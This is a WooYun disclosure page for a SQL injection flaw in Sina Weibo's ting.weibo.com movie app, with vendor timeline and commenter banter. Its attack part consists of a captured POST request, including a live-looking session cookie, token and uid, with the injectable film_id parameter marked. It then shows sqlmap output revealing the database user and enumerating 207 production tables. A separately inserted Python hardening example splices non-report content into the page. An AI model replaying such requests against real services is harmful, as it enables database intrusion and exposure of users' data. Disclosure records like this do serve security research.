
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0212734

Title: Another SQL Injection Vulnerability in Sina Weibo

Vendor: Sina Weibo

Author: 路人甲

Submitted: 2016-05-25 15:54

Fixed: 2016-07-10 17:50

Published: 2016-07-10 17:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2016-05-25: Details sent to the vendor; awaiting vendor handling
2016-05-26: Vendor confirmed; details disclosed to the vendor only
2016-06-05: Details disclosed to core white hats and domain experts
2016-06-15: Details disclosed to regular white hats
2016-06-25: Details disclosed to intern white hats
2016-07-10: Details disclosed to the public

Brief description:

Beep, deep-hole card. Zhou Zhiruo has already cried herself unconscious in the bathroom.

Detailed description:

POST http://ting.weibo.com/movieapp/dialogue/show HTTP/1.1
Host: ting.weibo.com
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Cookie: TING-G0-YF=61cb3ab25b54439455665d34a539fe7d; ua=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.__iPhone 6__os9.3.1__1.4.0
User-Agent: WeiboMovie/1.4.0 (iPhone; iOS 9.3.1; Scale/2.00)
Accept-Language: zh-Hans-US;q=1, en-US;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 231
action=dialogue%2Fshow&aid=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.&d_n=iPhone%206&film_id=178868*&from=8614093010&ip=100.77.76.179&os_n=iOS&os_v=9.3.1&token=2.00ddC5ZDcX6kGDfeab6c3adc0VbshD&uid=3271300273&v=1.4.0&wm=44995


Injectable parameter: film_id (marked with * in the request body above).
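The report gives no fix, so the following is an added example (not code from the report, from Sina Weibo, or from the affected service) of how a handler for a request like the one above should treat film_id: reject anything that is not a plain decimal id before it reaches the database, and bind the value as a query parameter. The table name movie_dialogue and its columns, the sqlite3 backend, and the sample rows are all assumptions for the demonstration; the real backend on this page is MySQL.

```python
"""Added example (not from the WooYun report): hardened handling of the
film_id parameter behind a POST like /movieapp/dialogue/show.

Assumptions not stated on the page: a table `movie_dialogue` with columns
(id, film_id, text), sqlite3 standing in for the MySQL backend, and the
constructed sample rows below.
"""
import re
import sqlite3

# film_id is a numeric identifier, so the allow-list is a short decimal string.
_FILM_ID_RE = re.compile(r"[0-9]{1,10}")


def parse_film_id(raw: str) -> int:
    """Accept only a plain decimal id; anything else (e.g. '178868*') is rejected."""
    if not _FILM_ID_RE.fullmatch(raw):
        raise ValueError("film_id must be a decimal integer")
    return int(raw)


def build_query_unsafe(raw_film_id: str) -> str:
    """The defect class reported on this page: untrusted input spliced into SQL.
    Whatever the client sends in film_id becomes part of the statement text."""
    return f"SELECT id, text FROM movie_dialogue WHERE film_id = {raw_film_id}"


def fetch_dialogues(conn: sqlite3.Connection, raw_film_id: str) -> list:
    """Hardened path: validate first, then bind the value as a parameter so the
    driver sends it as data and it is never interpreted as SQL."""
    film_id = parse_film_id(raw_film_id)
    cur = conn.execute(
        "SELECT id, text FROM movie_dialogue WHERE film_id = ? ORDER BY id",
        (film_id,),
    )
    return cur.fetchall()


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data; 178868 is the film id seen in the captured request."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movie_dialogue (id INTEGER PRIMARY KEY, film_id INTEGER, text TEXT)"
    )
    conn.executemany(
        "INSERT INTO movie_dialogue (id, film_id, text) VALUES (?, ?, ?)",
        [(1, 178868, "line one"), (2, 178868, "line two"), (3, 999, "other film")],
    )
    conn.commit()
    return conn


def handle_show(conn: sqlite3.Connection, form: dict) -> dict:
    """Minimal request handler: malformed input gets a 400-style response and
    never reaches the database; well-formed ids are looked up with bound parameters."""
    try:
        rows = fetch_dialogues(conn, form.get("film_id", ""))
    except ValueError as exc:
        return {"status": 400, "error": str(exc)}
    return {"status": 200, "dialogues": [{"id": i, "text": t} for i, t in rows]}


if __name__ == "__main__":
    db = build_demo_db()
    print(handle_show(db, {"film_id": "178868"}))   # 200 with two dialogue lines
    print(handle_show(db, {"film_id": "178868*"}))  # 400, rejected before any query
```

The two defences are independent: the integer allow-list turns the sqlmap-style marker in the captured request into a 400 at the edge, and the bound parameter means that even an id that slips past validation is compared as a value, not executed as SQL. The query string returned by build_query_unsafe is there only to make the contrast visible; it is never executed.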

Proof of vulnerability:

back-end DBMS: MySQL 5
current user: 'musiclib_r@10.75.%'
current database: 'musiclib'

back-end DBMS: MySQL 5
Database: musiclib
[207 tables]
+---------------------------------------+
| artist_match_name |
| cinema_area |
| cinema_baseinfo |
| cinema_screenings |
| cinema_tag |
| cinema_tag_mapcheck |
| firehose_info |
| mingxing_activity |
| mingxing_userflower |
| movie_action_count_score |
| movie_admin_page |
| movie_answers |
| movie_app_ad |
| movie_app_push_task |
| movie_app_realtime_push |
| movie_app_user |
| movie_app_user_token |
| movie_article |
| movie_artist |
| movie_box_office |
| movie_box_office_poll |
| movie_convert_callback |
| movie_coupon |
| movie_coupon_backup |
| movie_customize |
| movie_dialogue |
| movie_dialogue_pic |
| movie_dictionary |
| movie_emotion |
| movie_event_schedule |
| movie_film |
| movie_film_old |
| movie_film_promote |
| movie_filmtopic |
| movie_focus |
| movie_foreign_comment |
| movie_friendfeed |
| movie_game_rank |
| movie_game_seek_reply |
| movie_game_tools |
| movie_gewala_buy |
| movie_group_comment_report |
| movie_group_user |
| movie_hashdata |
| movie_hottopic |
| movie_nativebanner |
| movie_newsinfo |
| movie_object_relation |
| movie_pagepoll |
| movie_photo |
| movie_place_sale |
| movie_poll_daily_detail |
| movie_poll_detail |
| movie_poll_detail_hot |
| movie_poll_manul |
| movie_proterty |
| movie_push_map |
| movie_question_type |
| movie_questions |
| movie_relation |
| movie_relation_page |
| movie_tag_map |
| movie_ticket |
| movie_user_still |
| movie_video |
| movieapp_photo |
| open_api_info |
| open_api_tree |
| open_group |
| open_group_api_map |
| open_user |
| raw_album |
| raw_cinema_mapcheck |
| raw_map_check |
| raw_map_musician |
| raw_movie |
| raw_movie_artist_map |
| raw_movie_douban_pic |
| raw_movie_map |
| raw_mv |
| raw_mv_recommend |
| raw_podcast |
| raw_podcast_column |
| raw_podcast_map |
| raw_podcast_program |
| raw_singer |
| raw_song |
| raw_song_0 |
| raw_song_1 |
| raw_song_10 |
| raw_song_11 |
| raw_song_12 |
| raw_song_13 |
| raw_song_14 |
| raw_song_15 |
| raw_song_16 |
| raw_song_17 |
| raw_song_18 |
| raw_song_19 |
| raw_song_2 |
| raw_song_20 |
| raw_song_21 |
| raw_song_22 |
| raw_song_23 |
| raw_song_3 |
| raw_song_4 |
| raw_song_5 |
| raw_song_6 |
| raw_song_7 |
| raw_song_8 |
| raw_song_9 |
| raw_song_match |
| raw_source |
| res_ad |
| res_album |
| res_album_song_map |
| res_artist |
| res_artist_album_map |
| res_artist_song_map |
| res_asiapoll_blacklist |
| res_band |
| res_card_info |
| res_celebrity_songlist |
| res_chinasong_manul |
| res_comm_item |
| res_common_banner |
| res_copyright |
| res_copyright_album_map |
| res_copyright_artist_map |
| res_copyright_song_map |
| res_country |
| res_coupon_a |
| res_famous_songlist |
| res_feedback |
| res_film_bonus |
| res_film_coupon |
| res_focus |
| res_friendfeed |
| res_hashdata |
| res_hotweibo |
| res_hotweibo_new |
| res_interface_test |
| res_keyword_queue |
| res_language |
| res_language_album_map |
| res_language_artist_map |
| res_language_song_map |
| res_log |
| res_lyric |
| res_merge_log |
| res_music_style |
| res_musician_group |
| res_musician_page |
| res_musicstyle_album_map |
| res_musicstyle_artist_map |
| res_musicstyle_song_map |
| res_musictopic |
| res_nativebanner |
| res_object_creator_mblog |
| res_page_layout |
| res_page_render_map |
| res_page_rule_set |
| res_pagepoll |
| res_party_song |
| res_party_user_action |
| res_party_user_video |
| res_relation_store |
| res_reservation |
| res_right_card_map |
| res_right_card_model |
| res_s3_log |
| res_search_watch |
| res_share_text_map |
| res_song |
| res_song_audio |
| res_song_countinfo |
| res_song_ext |
| res_song_outter_00 |
| res_song_outter_01 |
| res_song_outter_02 |
| res_song_outter_03 |
| res_song_outter_04 |
| res_song_outter_05 |
| res_song_outter_06 |
| res_song_outter_07 |
| res_song_outter_08 |
| res_song_outter_09 |
| res_song_outter_0a |
| res_song_outter_0b |
| res_song_outter_0c |
| res_song_outter_0d |
| res_song_outter_0e |
| res_song_outter_0f |
| res_song_ringtone |
| res_songautopush_event |
| res_square_point_uid |
| res_timing_job |
| res_topic_monitor |
| res_uidlist |
| res_update_film |
| res_update_song |
| res_user |
| res_user_rate |
| res_usergroup |
| song_match_name |
| song_mv_map |
| xunlongjue_message |
+---------------------------------------+
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

Fix recommendation:

NULL

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed at: 2016-05-26 17:45

Vendor reply:

Thank you for your attention to Sina security; the issue is being fixed.

Latest status:

None yet


Comments:

  1. 2016-05-25 15:55 | zzR, verified white hat ( Core white hat | Rank: 1418, vulnerabilities: 128 | Dongfanghong ** Alliance welcomes you -0-)

    Here's an emoji for you people; feel it for yourselves, and put your heart into it.

  2. 2016-05-25 15:56 | Uknow ( Regular white hat | Rank: 230, vulnerabilities: 57 | Looking for a team!!!!)

    666666

  3. 2016-05-25 16:03 | 爱偷懒的98 ( Regular white hat | Rank: 182, vulnerabilities: 61 | In the old days carriages and mail were slow; a lifetime was only enough to love one person.)

    OP, I've thought up your next title for you: "Yet Yet Another SQL Injection Vulnerability in Sina Weibo".

  4. 2016-05-25 17:29 | Dotaer ( Passerby | Rank: 28, vulnerabilities: 8 | Study more, hunt more bugs!)

    Beep, veteran-driver card!

  5. 2016-05-25 17:56 | 围剿 ( Passerby | Rank: 17, vulnerabilities: 5 | Evil decimal)

    Beep, senior-citizen card~

  6. 2016-05-26 22:54 | Post ( Passerby | Rank: 28, vulnerabilities: 12 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    Sick, sick, sick